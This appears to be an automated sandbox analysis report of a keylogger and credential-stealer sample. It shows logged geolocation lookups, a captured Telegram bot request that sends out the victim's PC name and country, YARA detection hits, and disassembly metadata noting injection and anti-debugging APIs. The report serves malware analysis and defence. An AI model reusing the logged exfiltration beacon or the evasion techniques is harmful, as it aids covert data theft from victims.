    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=13019&min_rtt=1806&rtt_var=7482&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1616832&cwnd=180&unsent_bytes=0&cid=5fa79eb059748c88&ts=159&x=0"
2025-01-08 15:33:15 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49880 | 188.114.97.3 | 443 | 7492 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-08 15:33:16 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-08 15:33:16 UTC | 853 | IN | HTTP/1.1 200 OK
    Date: Wed, 08 Jan 2025 15:33:16 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1665185
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ISkDnimC6B%2F7CfJvNOCakNAXEwZpA1hmprMU0DfVCCjt28HQaB9ZFbvbz0oMzSDUsDMzEPz6cU38KVLw9872L140%2FZmJRaHO86wvh7B6LnbvY7eWWEmwI0tmTSchFlAvTk4wXVZH"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fed3eba4b0d7d1c-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=1969&rtt_var=839&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1229991&cwnd=157&unsent_bytes=0&cid=e888079326a94462&ts=161&x=0"
2025-01-08 15:33:16 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49892 | 188.114.97.3 | 443 | 7492 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-08 15:33:17 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-08 15:33:18 UTC | 854 | IN | HTTP/1.1 200 OK
    Date: Wed, 08 Jan 2025 15:33:18 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1665187
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=29cbVUb5FOia0zH9JLmNC9ZME5xr60Hedv%2BWKtTHg%2BfC8aiqYUimNzI0wRwHfyRPBlaf3WyrGi1OF4RjEiC0pOS6WfdFVl1odZFsEKcV3uiURzHrBYFpoLXZTPSptO%2FSmx0bm0cs"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fed3ec39b13f5f4-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1666&rtt_var=833&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4236&recv_bytes=699&delivery_rate=108052&cwnd=103&unsent_bytes=0&cid=a1b1aa9c987ce2a6&ts=185&x=0"
2025-01-08 15:33:18 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49904 | 188.114.97.3 | 443 | 7492 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-08 15:33:19 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-08 15:33:19 UTC | 861 | IN | HTTP/1.1 200 OK
    Date: Wed, 08 Jan 2025 15:33:19 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1665188
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gssEtJxRtycUxMSfrV0AchmaL%2Fw6M6b5PkbI%2B%2BHnSx81qv0cvkSjTvbCo%2B7lE9nGCJ6NPYI0RsGr891REiau6FSt%2BSRRlJlKtFMeI58KJim1hYFgp08jipzTLmOsRvCCPr5d4m%2FV"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fed3ecc889c0f84-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1628&rtt_var=636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1793611&cwnd=244&unsent_bytes=0&cid=c073b655a24c6c81&ts=176&x=0"
2025-01-08 15:33:19 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 8
Source IP: 192.168.2.4
Source Port: 49915
Destination IP: 188.114.97.3
Destination Port: 443
PID: 7492
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp                 Bytes  Direction  Data
2025-01-08 15:33:20 UTC   85     OUT        GET /xml/8.46.123.189 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
2025-01-08 15:33:20 UTC   855    IN         HTTP/1.1 200 OK
                                            Date: Wed, 08 Jan 2025 15:33:20 GMT
                                            Content-Type: text/xml
                                            Content-Length: 362
                                            Connection: close
                                            Age: 1665190
                                            Cache-Control: max-age=31536000
                                            cf-cache-status: HIT
                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nqXrTgDy5Fn06lsS9nLWezohY7GJ3eQuB0Vcaun5VDanWyoIRJ6edZilMYoKSccWZNHUCbzWCmjenxHpB5FsXGOaBfFDsgV3RrQx%2FX3VW50dSV%2FQ1XPezMhq47x6h73BoAOc0n7%2B"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8fed3ed5cf9119a1-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=2035&min_rtt=2031&rtt_var=770&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1413359&cwnd=118&unsent_bytes=0&cid=9121fc298a5cc52b&ts=154&x=0"
2025-01-08 15:33:20 UTC   362    IN         Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 9
Source IP: 192.168.2.4
Source Port: 49920
Destination IP: 149.154.167.220
Destination Port: 443
PID: 7492
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp                 Bytes  Direction  Data
2025-01-08 15:33:21 UTC   349    OUT        GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2009/01/2025%20/%2000:36:30%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                            Host: api.telegram.org
                                            Connection: Keep-Alive
2025-01-08 15:33:21 UTC   344    IN         HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0
                                            Date: Wed, 08 Jan 2025 15:33:21 GMT
                                            Content-Type: application/json
                                            Content-Length: 55
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-08 15:33:21 UTC   55     IN         Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}



Target ID: 0
Start time: 10:31:54
Start date: 08/01/2025
Path: C:\Users\user\Desktop\pbCN4g6sN5.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\pbCN4g6sN5.exe"
Imagebase: 0xa20000
File size: 816'128 bytes
MD5 hash: 7D88E5BAD194E89ADA135543169DA996
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2383848177.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2376499978.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 5
Start time: 10:32:33
Start date: 08/01/2025
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase: 0xa60000
File size: 42'064 bytes
MD5 hash: 5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2903836633.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false


Execution Graph

Execution Coverage: 21.5%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 5.2%
Total number of Nodes: 324
Total number of Limit Nodes: 14

Control-flow Graph
[Function starting at 5a1dbe8; rendered graph (executed / not-executed block colouring) omitted. Internal calls in this graph: 5a1d640, 5a1942c, 5a15a20]
Strings
Memory Dump Source
• Source File: 00000000.00000002.2385320229.0000000005A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5a10000_pbCN4g6sN5.jbxd
Similarity
• API ID:
• String ID: (mq$Hmq$Hmq$Hmq$Hmq$Hmq$Hmq$PHiq
• API String ID: 0-1751368234
• Opcode ID: d50a7bdbd1f8c089c972b7d4c6fda3f8f1e3b6481f63f6532f33fedc9ed6b144
• Instruction ID: d982aa030a22faf97b1de5dbdb79aa96ef711b8747c23c339c8112ea7f3b9641
• Opcode Fuzzy Hash: d50a7bdbd1f8c089c972b7d4c6fda3f8f1e3b6481f63f6532f33fedc9ed6b144
• Instruction Fuzzy Hash: 86628D317006148FCB58EB78C854B6E7BA7AFC8310F248569E81ADB3A5CE34DD468795

Control-flow Graph
[Function starting at a17bd0; rendered graph (executed / not-executed block colouring) omitted. Internal calls in this graph: a17bd0 (recursive), a175a9, a182f8]
Strings
Memory Dump Source
• Source File: 00000000.00000002.2376261436.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_pbCN4g6sN5.jbxd
Similarity
• API ID:
• String ID: (oiq$(oiq$(oiq$,mq$,mq
• API String ID: 0-2328226788
• Opcode ID: 23bc6c8cb192522e0c03b23f8b856f883475cc7a9e379c319c6e2e3b0bd37949
• Instruction ID: a8d12c8214902ea1d98e255436b054c28831f38e30f9122300ea3bdd54d29524
• Opcode Fuzzy Hash: 23bc6c8cb192522e0c03b23f8b856f883475cc7a9e379c319c6e2e3b0bd37949
• Instruction Fuzzy Hash: 10124F71A04209DFDB14CF69D984AEEBBF6FF88300F158069E415AB261DB35ED86CB50

Control-flow Graph
[Function starting at 7643433; rendered graph (executed / not-executed block colouring) omitted. Internal call in this graph: 764a9f8]
Memory Dump Source
• Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5f4ecd94ff4d953450869266e95cc3647e72012635f4e4d4e93566047f03ba6f
• Instruction ID: ce296de81b05e5f2a5d4b861c96f2794a3aafbd98953e5c6ae2a3a12939a91f2
• Opcode Fuzzy Hash: 5f4ecd94ff4d953450869266e95cc3647e72012635f4e4d4e93566047f03ba6f
• Instruction Fuzzy Hash: 9FB30870A11218CFCB59EF78D9996ADBBF2EB89300F4044E9D449A7258DF386D84DF81

Control-flow Graph
[Function starting at 7643448; rendered graph (executed / not-executed block colouring) omitted. Internal call in this graph: 764a9f8]
Memory Dump Source
• Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 373ef56e3c0652b08941faf32aa5456a58858273a1d5885cfdcb5b883f54248b
• Instruction ID: 72795897c40cb79d59d3ab1d0b6754f518709b1aec62ae2402be254e8ceb8e67
• Opcode Fuzzy Hash: 373ef56e3c0652b08941faf32aa5456a58858273a1d5885cfdcb5b883f54248b
• Instruction Fuzzy Hash: B6B30870A11218CFCB59EF78D9996ADBBF2EB89300F4044E9D449A7258DF386D84DF81

Control-flow Graph
[Function starting at 6d02100; rendered graph (executed / not-executed block colouring) omitted. Internal calls in this graph: 6d089f9, 6d09156]
Memory Dump Source
• Source File: 00000000.00000002.2385866228.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6d00000_pbCN4g6sN5.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b9ecc78f29d8c6d079a760fc2870b1d58244cdbbc5af3043087c20a90c512bbc
• Instruction ID: 0e87a7a31b3c0bd93027734b20b40144b8b589a0b5a818d817529955ac499c91
• Opcode Fuzzy Hash: b9ecc78f29d8c6d079a760fc2870b1d58244cdbbc5af3043087c20a90c512bbc
• Instruction Fuzzy Hash: 30B30B70A112188BDB54EF78EA586ACBBF2FB89300F4085EAD488A7358DF345D84DF55

Control-flow Graph
[Function starting at 8eab6f8; rendered graph (executed / not-executed block colouring) omitted. Internal calls in this graph: 8ea9a38, 8ea5088]
Strings
Memory Dump Source
• Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
Similarity
• API ID:
• String ID: e\1$e\1$"*p$"*p
• API String ID: 0-1513742261
• Opcode ID: 74a1aa537b6901133b4135e631d6c27e65d13028f83998c6e7190212ffc45a02
• Instruction ID: 2b4bd45503273d2f7793e758e51cf16380e194ca2db3b03537a1c966aef25d8e
• Opcode Fuzzy Hash: 74a1aa537b6901133b4135e631d6c27e65d13028f83998c6e7190212ffc45a02
• Instruction Fuzzy Hash: 0E8113B4D01219CFCB04CFA5D9846EEBBF2BF88351F20A52AD416BB254DB745A02CF54
Strings
Memory Dump Source
• Source File: 00000000.00000002.2387368395.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_77f0000_pbCN4g6sN5.jbxd
Similarity
• API ID:
• String ID: T@
• API String ID: 0-1813571376
• Opcode ID: 1af94d1d62130db9cdc7cb9111dc342710c2341a33a5ee02ec38fbd5c2c85e38
• Instruction ID: 4a1f0b694ac5e8adb2c545d5c33bfbe45d7e8ff20927db8ce33f1cac36e0bb44
• Opcode Fuzzy Hash: 1af94d1d62130db9cdc7cb9111dc342710c2341a33a5ee02ec38fbd5c2c85e38
• Instruction Fuzzy Hash: EA538F70A142148FCB14FF78DA8975DBBB9EF89300F8085EAD448A7259DB386E84CF55
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387368395.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_77f0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: @$G
                                                                                                                                                                • API String ID: 0-2525716807
                                                                                                                                                                • Opcode ID: 838ee1735737dda5186fd2998f080668399996a3a1605093a40dddd2ff775462
                                                                                                                                                                • Instruction ID: 8e8708ae847554067f1e6e21d8b8776d7576ec73974424a4d2342041f5aa10a4
                                                                                                                                                                • Opcode Fuzzy Hash: 838ee1735737dda5186fd2998f080668399996a3a1605093a40dddd2ff775462
                                                                                                                                                                • Instruction Fuzzy Hash: 4BD2BF30A183148FCB15BB78D95879DBBB6FF89300F4185EAD088E72A9DB386D45CB51
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 6f$6f$$iq
                                                                                                                                                                • API String ID: 0-138693396
                                                                                                                                                                • Opcode ID: 7c0735b9037cd5c51edfe32c250a28431f82f566d309237dfd85e9a59f3d340d
                                                                                                                                                                • Instruction ID: e5218af317a5c1b4e3c194146537d5df8e801becba258b8c6f61f39a225fa661
                                                                                                                                                                • Opcode Fuzzy Hash: 7c0735b9037cd5c51edfe32c250a28431f82f566d309237dfd85e9a59f3d340d
                                                                                                                                                                • Instruction Fuzzy Hash: C971C178E10208DFDB44DFA5D59599EBFB2FF88301F20902AE40AAB394DB345946CF55
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2385866228.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_6d00000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: G$Teiq
                                                                                                                                                                • API String ID: 0-244323017
                                                                                                                                                                • Opcode ID: 1441f0184e6ea33e98b325dfe041857211db562e94cccfd609f4746cc1325f1f
                                                                                                                                                                • Instruction ID: 7e227dff16e596fc80a75ed8811a070b6e5964a8fe067b1a4ed318045cc44b4c
                                                                                                                                                                • Opcode Fuzzy Hash: 1441f0184e6ea33e98b325dfe041857211db562e94cccfd609f4746cc1325f1f
                                                                                                                                                                • Instruction Fuzzy Hash: 91720130A183058FD715FB78DD58B5D7FB2EF86200F4585EAC488E72A9DA389C49CB61
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2376261436.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a10000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (oiq$Hmq
                                                                                                                                                                • API String ID: 0-3937764413
                                                                                                                                                                • Opcode ID: 4aa1cc0ca572ebe6073a291e77d7f73ae65ef63450f6e9f81ca481a9c495982e
                                                                                                                                                                • Instruction ID: 340cf84821373568e329a34486ca9a7cdfc025a04ed91e1be1d44fe809e7a47b
                                                                                                                                                                • Opcode Fuzzy Hash: 4aa1cc0ca572ebe6073a291e77d7f73ae65ef63450f6e9f81ca481a9c495982e
                                                                                                                                                                • Instruction Fuzzy Hash: 51129070A042199FDB14DF69C854BAEBBB6FF88300F208569E445DB395DF349D85CB90
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387368395.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_77f0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: Teiq$Teiq
                                                                                                                                                                • API String ID: 0-585364711
                                                                                                                                                                • Opcode ID: ab14b3c6dfa5e1d8b12458fc6ff63256912bcbfeebb17fb805d67afe242d1eee
                                                                                                                                                                • Instruction ID: ab9640f4a29128bc0c9ce5f846a4a8f35b154c3d2467c18237de880c19ccd585
                                                                                                                                                                • Opcode Fuzzy Hash: ab14b3c6dfa5e1d8b12458fc6ff63256912bcbfeebb17fb805d67afe242d1eee
                                                                                                                                                                • Instruction Fuzzy Hash: 6691E2B0E142099FCB08CFAAC994A9EFBB2FF89300F24942AD515BB354D7749906CF54
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 6f$$iq
                                                                                                                                                                • API String ID: 0-2737234785
                                                                                                                                                                • Opcode ID: 2345de85ce3dfd37d1e3ddc925a7038f55bea3bf70632e2900af663f56894f24
                                                                                                                                                                • Instruction ID: 694a1eed54b5c02eb5984b8faa17f6f947334d810380ee272ebc92b083eeafd5
                                                                                                                                                                • Opcode Fuzzy Hash: 2345de85ce3dfd37d1e3ddc925a7038f55bea3bf70632e2900af663f56894f24
                                                                                                                                                                • Instruction Fuzzy Hash: 4A71D478E10208DFDB44DFA5D59599EBFB2FF88301F20902AE406AB7A4DB345946CF51
                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 08EAB2E3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateProcessUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2217836671-0
                                                                                                                                                                • Opcode ID: 61b169b2eac258ef0955bcf30fec4a679cda02c9345afb81c591765451636ef0
                                                                                                                                                                • Instruction ID: ca96ab1ab024eb2ec1af877b1222f70421bd4b7b19126624d5fb7c37c8a6ed36
                                                                                                                                                                • Opcode Fuzzy Hash: 61b169b2eac258ef0955bcf30fec4a679cda02c9345afb81c591765451636ef0
                                                                                                                                                                • Instruction Fuzzy Hash: B451F871D00229DFDB24CF99D840BDDBBB5BF88714F1480AAE908B7250DB75AA85CF90
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 077FCEBB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387368395.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_77f0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                • Opcode ID: 8c38c396002546cb0443f73fac501682c4e3a6765e7ad42145293c8e7aca77b6
                                                                                                                                                                • Instruction ID: 3117bfa0c25229cec19817854e4a6c0b69887ed8091c6a2a9c56825f311d6c95
                                                                                                                                                                • Opcode Fuzzy Hash: 8c38c396002546cb0443f73fac501682c4e3a6765e7ad42145293c8e7aca77b6
                                                                                                                                                                • Instruction Fuzzy Hash: 2841FBB1E006198FDB18DFAAD94479EFBF2AFC8310F14C0AAD508A7264DB345A45CF21
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2385866228.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_6d00000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: Xmq
                                                                                                                                                                • API String ID: 0-2220694776
                                                                                                                                                                • Opcode ID: c5f44ac1cd89c9f0f06c304b073848e0e354e5dd999040a8134735a36bf786bf
                                                                                                                                                                • Instruction ID: b485c1ba40aa92cbbca8291aa8dd796f409232588b033549d1e5f3d2b52e8eb4
                                                                                                                                                                • Opcode Fuzzy Hash: c5f44ac1cd89c9f0f06c304b073848e0e354e5dd999040a8134735a36bf786bf
                                                                                                                                                                • Instruction Fuzzy Hash: ECB19670F04215CFFBA41FAA894433A7AA7AFC0B11F68591FD8969B2D4CE34C841DB95
                                                                                                                                                                APIs
                                                                                                                                                                • CheckRemoteDebuggerPresent.KERNELBASE(00000000,?), ref: 00A1D92F
                                                                                                                                                                Memory Dump Source
